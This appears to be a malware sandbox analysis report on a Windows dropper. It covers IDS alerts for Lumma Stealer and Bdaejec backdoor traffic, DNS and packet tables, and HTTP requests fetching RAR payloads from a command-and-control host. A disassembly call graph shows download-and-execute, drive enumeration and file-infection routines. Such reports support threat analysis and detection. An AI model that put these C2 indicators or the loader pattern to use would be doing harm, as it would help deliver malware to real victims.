                            2024-07-25T04:58:16.445372+0200UDP2050857ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (strainriskpropos .store)5422053192.168.2.61.1.1.1
                            2024-07-25T04:58:17.447057+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49715799192.168.2.644.221.84.105
                            2024-07-25T04:59:07.625811+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972420.114.59.183192.168.2.6
                            2024-07-25T04:58:12.573742+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5403053192.168.2.61.1.1.1
                            2024-07-25T04:58:16.431602+0200UDP2050859ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (telephoneverdictyow .site)5444353192.168.2.61.1.1.1
                            2024-07-25T04:58:30.030977+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971920.114.59.183192.168.2.6
                            2024-07-25T04:58:16.357306+0200UDP2050858ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (theoryapparatusjuko .fun)5267453192.168.2.61.1.1.1
                            2024-07-25T04:58:16.420501+0200UDP2050860ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (punchtelephoneverdi .store)5654853192.168.2.61.1.1.1
                            2024-07-25T04:58:16.306584+0200UDP2050898ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (healthproline .pro)5699553192.168.2.61.1.1.1

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 04:58:12.980428934 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:12.986148119 CEST7994971344.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:12.986224890 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:12.986789942 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:12.994493008 CEST7994971344.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:13.398428917 CEST7994971344.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:13.398502111 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:13.398541927 CEST7994971344.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:13.398616076 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:13.424463034 CEST49713799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:13.429507971 CEST7994971344.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:17.032901049 CEST49715799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:17.037956953 CEST7994971544.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:17.038073063 CEST49715799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:17.038465023 CEST49715799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:17.043425083 CEST7994971544.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:17.446909904 CEST7994971544.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:17.446959019 CEST7994971544.221.84.105192.168.2.6
                            Jul 25, 2024 04:58:17.447057009 CEST49715799192.168.2.644.221.84.105
                            Jul 25, 2024 04:58:20.933195114 CEST49715799192.168.2.644.221.84.105

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 04:58:12.573741913 CEST5403053192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:12.762744904 CEST53540301.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.306583881 CEST5699553192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.315382957 CEST53569951.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.357306004 CEST5267453192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.366641998 CEST53526741.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.386792898 CEST5483253192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.404071093 CEST53548321.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.407005072 CEST5104853192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.416244030 CEST53510481.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.420500994 CEST5654853192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.430304050 CEST53565481.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.431602001 CEST5444353192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.440463066 CEST53544431.1.1.1192.168.2.6
                            Jul 25, 2024 04:58:16.445372105 CEST5422053192.168.2.61.1.1.1
                            Jul 25, 2024 04:58:16.454210997 CEST53542201.1.1.1192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 25, 2024 04:58:12.573741913 CEST192.168.2.61.1.1.10xcc24Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.306583881 CEST192.168.2.61.1.1.10x309cStandard query (0)healthproline.proA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.357306004 CEST192.168.2.61.1.1.10x9fdbStandard query (0)theoryapparatusjuko.funA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.386792898 CEST192.168.2.61.1.1.10x969bStandard query (0)snuggleapplicationswo.funA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.407005072 CEST192.168.2.61.1.1.10x98ebStandard query (0)smallrabbitcrossing.siteA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.420500994 CEST192.168.2.61.1.1.10xfab1Standard query (0)punchtelephoneverdi.storeA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.431602001 CEST192.168.2.61.1.1.10x5e7bStandard query (0)telephoneverdictyow.siteA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.445372105 CEST192.168.2.61.1.1.10x89d8Standard query (0)strainriskpropos.storeA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 25, 2024 04:58:12.762744904 CEST1.1.1.1192.168.2.60xcc24No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.315382957 CEST1.1.1.1192.168.2.60x309cName error (3)healthproline.prononenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.366641998 CEST1.1.1.1192.168.2.60x9fdbName error (3)theoryapparatusjuko.funnonenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.404071093 CEST1.1.1.1192.168.2.60x969bName error (3)snuggleapplicationswo.funnonenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.416244030 CEST1.1.1.1192.168.2.60x98ebName error (3)smallrabbitcrossing.sitenonenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.430304050 CEST1.1.1.1192.168.2.60xfab1Name error (3)punchtelephoneverdi.storenonenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.440463066 CEST1.1.1.1192.168.2.60x5e7bName error (3)telephoneverdictyow.sitenonenoneA (IP address)IN (0x0001)false
                            Jul 25, 2024 04:58:16.454210997 CEST1.1.1.1192.168.2.60x89d8Name error (3)strainriskpropos.storenonenoneA (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • ddos.dnsnb8.net:799

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.64971344.221.84.1057995352C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 04:58:12.986789942 CEST288OUTGET /cj//k1.rar HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ddos.dnsnb8.net:799
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.64971544.221.84.1057995352C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            TimestampBytes transferredDirectionData
                            Jul 25, 2024 04:58:17.038465023 CEST288OUTGET /cj//k2.rar HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ddos.dnsnb8.net:799
                            Connection: Keep-Alive


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:22:58:11
                            Start date:24/07/2024
                            Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
                            Imagebase:0xe0000
                            File size:4'900'864 bytes
                            MD5 hash:0140E8AAB1D9274870495213CDF82291
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:22:58:11
                            Start date:24/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Imagebase:0x320000
                            File size:15'872 bytes
                            MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 92%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:6
                            Start time:22:58:16
                            Start date:24/07/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
                            Imagebase:0x750000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:28.8%
                              Dynamic/Decrypted Code Coverage:10.4%
                              Signature Coverage:23.6%
                              Total number of Nodes:297
                              Total number of Limit Nodes:10
                              execution_graph 1012 3214e1 1013 321541 1012->1013 1014 3214fd GetModuleHandleA 1012->1014 1017 321573 1013->1017 1018 321549 1013->1018 1015 321512 1014->1015 1016 32151a VirtualQuery 1014->1016 1015->1013 1016->1015 1023 321638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1017->1023 1020 321566 1018->1020 1040 321af9 1018->1040 1021 321579 ExitProcess 1024 32167a 1023->1024 1025 32167f 1023->1025 1058 32139f GetVersionExA 1024->1058 1046 321718 GetSystemTimeAsFileTime 1025->1046 1028 321686 1029 3216ca 1028->1029 1032 3216a0 CreateThread 1028->1032 1030 3216d0 1029->1030 1031 3216d7 1029->1031 1079 321581 1030->1079 1034 32170f 1031->1034 1035 3216dd lstrcpy 1031->1035 1051 322c48 memset 1032->1051 1295 321099 1032->1295 1034->1021 1035->1021 1039 321718 3 API calls 1039->1029 1041 321b11 1040->1041 1042 321b09 1040->1042 1044 321b16 CreateThread 1041->1044 1045 321b0f 1041->1045 1043 321638 188 API calls 1042->1043 1043->1045 1044->1045 1314 321638 189 API calls 1044->1314 1045->1020 1045->1045 1047 321754 1046->1047 1048 321735 SHSetValueA 1046->1048 1049 32175a SHGetValueA 1047->1049 1050 321786 __aulldiv 1047->1050 1048->1050 1049->1050 1050->1028 1085 321973 PathFileExistsA 1051->1085 1054 322cb2 1056 322cbb VirtualFree 1054->1056 1057 3216ba WaitForSingleObject 1054->1057 1055 322c8f CreateThread WaitForMultipleObjects 1055->1054 1107 322b8c memset GetLogicalDriveStringsA 1055->1107 1056->1057 1057->1039 1059 3214da 1058->1059 1060 3213cf LookupPrivilegeValueA 1058->1060 1059->1025 1061 3213ef 1060->1061 1062 3213e7 1060->1062 1061->1059 1280 32120e GetModuleHandleA GetProcAddress 1061->1280 1275 32119f GetCurrentProcess OpenProcessToken 1062->1275 1068 321448 GetCurrentProcessId 1068->1059 1069 321457 1068->1069 1069->1059 1070 321319 3 API calls 1069->1070 1071 32147f 1070->1071 1072 321319 3 API calls 1071->1072 1073 32148e 1072->1073 1073->1059 1074 321319 3 API calls 1073->1074 1075 3214b4 1074->1075 1076 321319 3 API calls 1075->1076 1077 3214c3 1076->1077 1078 321319 3 API calls 1077->1078 1078->1059 1294 32185b GetSystemTimeAsFileTime srand rand srand rand 1079->1294 1081 321592 wsprintfA wsprintfA lstrlen CreateFileA 1082 321633 1081->1082 1083 3215fb WriteFile CloseHandle 1081->1083 1082->1034 1083->1082 1084 32161d ShellExecuteA 1083->1084 1084->1082 1086 3219a0 1085->1086 1087 321ac7 1085->1087 1088 3219af CreateFileA 1086->1088 1087->1054 1087->1055 1089 3219c4 Sleep 1088->1089 1090 321a28 GetFileSize 1088->1090 1089->1088 1091 3219d5 1089->1091 1092 321a80 1090->1092 1093 321a38 1090->1093 1106 32185b GetSystemTimeAsFileTime srand rand srand rand 1091->1106 1094 321a96 1092->1094 1095 321a8d FindCloseChangeNotification 1092->1095 1093->1092 1097 321a3d VirtualAlloc 1093->1097 1098 321aad 1094->1098 1104 321a9c DeleteFileA 1094->1104 1095->1094 1097->1092 1105 321a53 1097->1105 1098->1087 1103 321ab8 VirtualFree 1098->1103 1099 3219da wsprintfA CopyFileA 1099->1090 1101 321a0d CreateFileA 1099->1101 1101->1090 1101->1104 1102 321a59 ReadFile 1102->1092 1102->1105 1103->1087 1104->1098 1105->1092 1105->1102 1106->1099 1108 322c09 WaitForMultipleObjects 1107->1108 1113 322bc8 1107->1113 1110 322c2a CreateThread 1108->1110 1111 322c3c 1108->1111 1109 322bfa lstrlen 1109->1108 1109->1113 1110->1111 1118 322845 1110->1118 1112 322bd2 GetDriveTypeA 1112->1109 1112->1113 1113->1109 1113->1112 1114 322be3 CreateThread 1113->1114 1114->1109 1115 322b7d 1114->1115 1128 3229e2 memset wsprintfA 1115->1128 1265 32274a memset memset SHGetSpecialFolderPathA wsprintfA 1118->1265 1120 322878 DeleteFileA 1121 32289a 1120->1121 1122 32288c VirtualFree 1120->1122 1125 3228a4 CloseHandle 1121->1125 1126 3228ab 1121->1126 1122->1121 1123 322853 1123->1120 1124 322692 8 API calls 1123->1124 1127 32239d 186 API calls 1123->1127 1124->1123 1125->1126 1127->1123 1129 322a3a memset lstrlen lstrcpyn strrchr 1128->1129 1130 322abc memset memset FindFirstFileA 1128->1130 1129->1130 1132 322a88 1129->1132 1142 3228b8 memset wsprintfA 1130->1142 1132->1130 1133 322a9a lstrcmpiA 1132->1133 1135 322b74 1133->1135 1136 322aad lstrlen 1133->1136 1136->1130 1136->1133 1137 322b61 FindNextFileA 1138 322b23 1137->1138 1139 322b6d FindClose 1137->1139 1140 322b35 lstrcmpiA 1138->1140 1141 3228b8 174 API calls 1138->1141 1139->1135 1140->1138 1140->1139 1141->1137 1143 322905 1142->1143 1148 322951 memset 1142->1148 1144 322956 strrchr 1143->1144 1145 32291b memset wsprintfA 1143->1145 1143->1148 1147 322967 lstrcmpiA 1144->1147 1144->1148 1146 3229e2 180 API calls 1145->1146 1146->1148 1149 32297a 1147->1149 1150 322988 lstrcmpiA 1147->1150 1148->1137 1160 321e6e 1149->1160 1150->1148 1151 322994 1150->1151 1153 3229ad strstr 1151->1153 1154 3229a5 lstrcpy 1151->1154 1155 3229d3 1153->1155 1156 3229cb 1153->1156 1154->1153 1225 322692 1155->1225 1203 32239d strstr 1156->1203 1161 321e7d 1160->1161 1234 321df6 strrchr 1161->1234 1164 322332 1168 322346 1164->1168 1169 32233d UnmapViewOfFile 1164->1169 1165 321eb0 SetFileAttributesA CreateFileA 1165->1164 1166 321edf 1165->1166 1239 321915 1166->1239 1171 322350 1168->1171 1172 32234b FindCloseChangeNotification 1168->1172 1169->1168 1173 322391 1171->1173 1174 322356 FindCloseChangeNotification 1171->1174 1172->1171 1173->1148 1174->1173 1175 321f2e 1175->1164 1245 321c81 1175->1245 1179 321f92 1180 321c81 2 API calls 1179->1180 1181 321f9f 1180->1181 1181->1164 1182 321af9 169 API calls 1181->1182 1183 322024 1181->1183 1187 321fc0 1182->1187 1183->1164 1184 321af9 169 API calls 1183->1184 1185 32207a 1184->1185 1186 321af9 169 API calls 1185->1186 1191 322090 1186->1191 1187->1164 1187->1183 1188 321af9 169 API calls 1187->1188 1189 321ffe 1188->1189 1190 322013 FlushViewOfFile 1189->1190 1190->1183 1192 3220bb memset memset 1191->1192 1193 3220f5 1192->1193 1194 321c81 2 API calls 1193->1194 1195 3221de 1194->1195 1196 322226 memcpy UnmapViewOfFile CloseHandle 1195->1196 1250 321b8a 1196->1250 1198 32226e 1258 32185b GetSystemTimeAsFileTime srand rand srand rand 1198->1258 1200 3222ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1201 321915 3 API calls 1200->1201 1202 32231f CloseHandle 1201->1202 1202->1164 1204 322451 CreateFileA GetFileSize 1203->1204 1210 3223d8 1203->1210 1205 322480 1204->1205 1206 322675 CloseHandle 1204->1206 1205->1206 1208 322499 1205->1208 1207 32267c RemoveDirectoryA 1206->1207 1209 322687 1207->1209 1211 321915 3 API calls 1208->1211 1209->1148 1210->1204 1210->1209 1212 3224a4 9 API calls 1211->1212 1260 32189d memset CreateProcessA 1212->1260 1215 32255c Sleep memset wsprintfA 1216 3229e2 163 API calls 1215->1216 1217 322597 memset wsprintfA Sleep 1216->1217 1218 32189d 6 API calls 1217->1218 1219 3225e4 Sleep CreateFileA 1218->1219 1220 321915 3 API calls 1219->1220 1221 322610 CloseHandle 1220->1221 1221->1207 1222 32261e 1221->1222 1222->1207 1223 322641 SetFilePointer WriteFile 1222->1223 1223->1207 1224 322667 SetEndOfFile 1223->1224 1224->1207 1226 3226b2 WaitForSingleObject 1225->1226 1227 3226a2 CreateEventA 1225->1227 1228 3226c1 lstrlen ??2@YAPAXI 1226->1228 1231 322708 1226->1231 1227->1226 1229 322736 SetEvent 1228->1229 1230 3226da lstrcpy 1228->1230 1229->1148 1232 3226f1 1230->1232 1231->1229 1233 322718 lstrcpy ??3@YAXPAX 1231->1233 1232->1229 1233->1232 1235 321e62 1234->1235 1236 321e13 lstrcpy strrchr 1234->1236 1235->1164 1235->1165 1236->1235 1237 321e40 lstrcmpiA 1236->1237 1237->1235 1238 321e52 lstrlen 1237->1238 1238->1235 1238->1237 1240 321928 1239->1240 1243 321924 SetFilePointer CreateFileMappingA MapViewOfFile 1239->1243 1241 32192e memset GetFileTime 1240->1241 1242 32194f 1240->1242 1241->1243 1242->1243 1244 321954 SetFileTime 1242->1244 1243->1164 1243->1175 1244->1243 1246 321c94 1245->1246 1247 321c9c 1245->1247 1246->1164 1249 32185b GetSystemTimeAsFileTime srand rand srand rand 1246->1249 1247->1246 1248 321cae memset memset 1247->1248 1248->1246 1249->1179 1251 321b93 1250->1251 1259 32185b GetSystemTimeAsFileTime srand rand srand rand 1251->1259 1253 321bca srand 1254 321bd8 rand 1253->1254 1255 321c08 1254->1255 1255->1254 1256 321c29 memset memcpy lstrcat 1255->1256 1256->1198 1258->1200 1259->1253 1261 3218e0 CloseHandle WaitForSingleObject 1260->1261 1262 32190c 1260->1262 1263 321907 CloseHandle 1261->1263 1264 3218fb GetExitCodeProcess 1261->1264 1262->1207 1262->1215 1263->1262 1264->1263 1274 32185b GetSystemTimeAsFileTime srand rand srand rand 1265->1274 1267 3227b5 wsprintfA CopyFileA 1268 322840 1267->1268 1269 3227de wsprintfA 1267->1269 1268->1123 1270 321973 17 API calls 1269->1270 1271 32280f 1270->1271 1272 322813 DeleteFileA 1271->1272 1273 322820 CreateFileA 1271->1273 1272->1273 1273->1268 1274->1267 1276 321200 CloseHandle 1275->1276 1277 3211c6 AdjustTokenPrivileges 1275->1277 1276->1061 1278 3211f6 1277->1278 1279 3211f7 CloseHandle 1277->1279 1278->1279 1279->1276 1281 321310 1280->1281 1282 32123f GetCurrentProcessId OpenProcess 1280->1282 1281->1059 1289 321319 1281->1289 1282->1281 1286 321262 1282->1286 1283 3212b0 VirtualAlloc 1283->1286 1288 3212b8 1283->1288 1284 3212f1 CloseHandle 1284->1281 1285 321302 VirtualFree 1284->1285 1285->1281 1286->1283 1286->1284 1287 321296 VirtualFree 1286->1287 1286->1288 1287->1283 1288->1284 1290 32134a 1289->1290 1291 32132a GetModuleHandleA GetProcAddress 1289->1291 1292 321351 memset 1290->1292 1293 321363 1290->1293 1291->1290 1291->1293 1292->1293 1293->1059 1293->1068 1294->1081 1296 3210ba 1295->1296 1297 321196 1295->1297 1296->1297 1313 32185b GetSystemTimeAsFileTime srand rand srand rand 1296->1313 1299 321118 wsprintfA wsprintfA URLDownloadToFileA 1300 321168 lstrlen Sleep 1299->1300 1301 3210dc 1299->1301 1300->1296 1304 321000 CreateFileA 1301->1304 1305 321092 WinExec lstrlen 1304->1305 1306 321025 GetFileSize CreateFileMappingA MapViewOfFile 1304->1306 1305->1296 1305->1297 1307 321057 1306->1307 1308 32107b 1306->1308 1309 321061 1307->1309 1310 321074 UnmapViewOfFile 1307->1310 1311 321087 CloseHandle 1308->1311 1312 32108d CloseHandle 1308->1312 1309->1310 1310->1308 1311->1312 1312->1305 1313->1299 1329 322361 1330 322374 1329->1330 1331 32236b UnmapViewOfFile 1329->1331 1332 322382 1330->1332 1333 322379 CloseHandle 1330->1333 1331->1330 1334 322391 1332->1334 1335 322388 CloseHandle 1332->1335 1333->1332 1335->1334 1315 326076 1316 32607b 1315->1316 1321 3260c7 1315->1321 1318 3260b0 VirtualAlloc 1316->1318 1319 3261b2 1316->1319 1316->1321 1317 32615f VirtualFree 1317->1321 1318->1321 1323 326389 VirtualProtect 1319->1323 1328 3262fb 1319->1328 1320 326198 VirtualFree 1320->1319 1321->1317 1321->1320 1322 3260d5 VirtualAlloc 1321->1322 1322->1321 1326 3263b7 1323->1326 1324 3263fc VirtualProtect 1325 326400 1324->1325 1326->1324 1327 3263e7 VirtualProtect 1326->1327 1327->1324 1327->1326 1336 326014 1337 326035 GetModuleHandleA 1336->1337 1340 32605f 1336->1340 1338 32604d GetProcAddress 1337->1338 1339 326058 1338->1339 1339->1338 1339->1340 1341 326158 VirtualFree 1349 3260c7 1341->1349 1342 326198 VirtualFree 1351 3261b2 1342->1351 1343 3260d5 VirtualAlloc 1343->1349 1344 326389 VirtualProtect 1348 3263b7 1344->1348 1345 3263fc VirtualProtect 1346 326400 1345->1346 1347 32615f VirtualFree 1347->1349 1348->1345 1350 3263e7 VirtualProtect 1348->1350 1349->1342 1349->1343 1349->1347 1350->1345 1350->1348 1351->1344 1352 3262fb 1351->1352

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_003269B0 1 Function_00326734 19 Function_00326B02 1->19 21 Function_00326D00 1->21 25 Function_00326A84 1->25 2 Function_00326834 3 Function_003228B8 7 Function_00322692 3->7 17 Function_0032239D 3->17 40 Function_003229E2 3->40 46 Function_00321E6E 3->46 4 Function_00321638 12 Function_00321718 4->12 13 Function_00321099 4->13 16 Function_0032139F 4->16 24 Function_00321581 4->24 47 Function_003217D0 4->47 53 Function_00322C48 4->53 5 Function_003265A6 6 Function_003267A4 8 Function_00326012 9 Function_00326014 10 Function_00321915 11 Function_00322D9B 34 Function_00322CF0 12->34 20 Function_00321000 13->20 48 Function_0032185B 13->48 14 Function_00321319 15 Function_0032119F 16->14 16->15 29 Function_0032120E 16->29 17->10 18 Function_0032189D 17->18 17->40 41 Function_00326B63 19->41 20->47 21->0 32 Function_00326CF2 21->32 21->41 22 Function_00326001 28 Function_0032600A 22->28 23 Function_00321C81 24->48 30 Function_0032680F 25->30 25->32 26 Function_00321D8A 27 Function_00321B8A 27->48 31 Function_00322B8C 39 Function_00322B7D 31->39 51 Function_00322845 31->51 37 Function_00326CF8 32->37 33 Function_00321973 33->48 35 Function_00326076 54 Function_003266C8 35->54 36 Function_00321DF6 38 Function_00321AF9 38->4 39->40 40->3 41->0 41->2 41->6 42 Function_00322D60 43 Function_003214E1 43->4 43->38 44 Function_00322361 44->11 45 Function_00321C68 46->10 46->11 46->23 46->26 46->27 46->36 46->38 46->42 46->45 46->48 49 Function_00326158 49->54 50 Function_0032235D 51->7 51->17 52 Function_0032274A 51->52 52->33 52->48 53->31 53->33 54->19 54->21 54->25

                              Executed Functions

                              Function 003229E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 3229e2-322a34 memset wsprintfA 102 322a3a-322a86 memset lstrlen lstrcpyn strrchr 101->102 103 322abc-322b21 memset * 2 FindFirstFileA call 3228b8 memset 101->103 102->103 105 322a88-322a98 102->105 110 322b61-322b6b FindNextFileA 103->110 105->103 106 322a9a-322aa7 lstrcmpiA 105->106 108 322b74-322b7a 106->108 109 322aad-322aba lstrlen 106->109 109->103 109->106 111 322b23-322b2a 110->111 112 322b6d-322b6e FindClose 110->112 113 322b4c-322b5c call 3228b8 111->113 114 322b2c-322b33 111->114 112->108 113->110 114->113 115 322b35-322b4a lstrcmpiA 114->115 115->112 115->113
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                              • String ID: %s*$C:\$Documents and Settings
                              • API String ID: 2826467728-110786608
                              • Opcode ID: 6dd721a27e4cc9c15232c1cc38d42c1486f4b01f00f10aa7bdaa34d0f0ce9c4b
                              • Instruction ID: 73c476861451471652f25b9a6a6c28759bdd2e80e21ff83c2755f439ee3ec1d5
                              • Opcode Fuzzy Hash: 6dd721a27e4cc9c15232c1cc38d42c1486f4b01f00f10aa7bdaa34d0f0ce9c4b
                              • Instruction Fuzzy Hash: 8C4172B2804359BFD732DBA0EC89DEB77ACEB84315F04482AF945D7111E634D6498BA2
                              Function 00321099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74stringsleepprocessCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 321099-3210b4 173 3210ba-3210c7 172->173 174 321199-32119c 172->174 175 3210c8-3210d4 173->175 176 321184-321190 175->176 177 3210da 175->177 176->175 178 321196-321198 176->178 179 321113-321162 call 32185b wsprintfA * 2 URLDownloadToFileA 177->179 178->174 182 321168-321182 lstrlen Sleep 179->182 183 3210dc-32110d call 321000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                              APIs
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • WinExec.KERNEL32(?,00000005), ref: 003210F1
                              • lstrlen.KERNEL32(00324748), ref: 003210FA
                              • wsprintfA.USER32 ref: 0032112A
                              • wsprintfA.USER32 ref: 00321143
                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0032115B
                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00321169
                              • Sleep.KERNEL32 ref: 00321179
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG2$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1280626985-2007074917
